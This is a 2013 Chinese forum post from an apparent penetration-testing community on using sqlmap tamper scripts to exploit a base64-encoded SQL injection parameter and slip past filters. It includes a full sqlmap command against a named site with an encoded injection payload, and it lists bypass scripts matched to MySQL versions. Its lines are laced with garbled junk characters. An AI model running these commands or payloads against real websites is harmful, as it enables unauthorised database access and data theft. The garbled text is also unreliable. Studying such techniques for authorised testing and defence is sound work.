中国网络渗透测试联盟

标题: SQlMap Tamper注入Base64编码注入点 [打印本页]
作者: admin    时间: 2013-11-23 15:50
标题: SQlMap Tamper注入Base64编码注入点
WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?3 Q2 c* \. z+ Q

, G- L* r# I  ]; A; x; g% ^6 Q6 Csqlmap的tamper里有个base64encode.py" i3 m; D; _9 K
. u3 E& E2 W0 p/ I; b6 ?/ G7 h; F
使用如下+ G: u9 e8 D8 U8 R, V
3 p7 q5 I) ~% J
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
3 h. A6 j# \* H, F( }6 J* e- ]# {  u2 X) _! n7 y

, \7 l8 n+ k$ E8 u) ~" d( @sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”, ~' x, m% _1 _

4 l: j. v7 I2 L8 k其中常用到的bypass脚本绕过SQLMAP主要两个脚本:  e$ ]( S7 Q: c7 L
: R+ j0 \, ?- Q% d
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入" Y. Z9 W, ?9 P' {$ e  Z
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入7 a( ]; p, J, F: X, y, C& ?: J
首先确定目标数据库版本,然后选择相应的脚本。
. J# e4 R1 m3 d& ^/ o-v 3 --batch --tamper "space2hash.py"7 g4 G( S1 e9 B, V

1 |) v( v, F( ^% C还有其他一些插件:
( w5 X# \% ?$ r# Q2 e  {; fencodes编码 ——charencode.py
6 ]0 b7 R; a6 w! S6 i$ g- wbase64编码 —— base64encode.py
1 L' A% n  a( M3 J- F; i! V% e替换空格和关键字 —— halfversionedmorekeywords.py
$ }$ O# V( o; u0 U8 X7 J: n

, g3 p- v5 Q7 X+ R$ c7 u; J1 n
& j- `( E/ T- C: N6 f3 s5 ]& L& k; \

- G  H7 L- Z- |( S



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2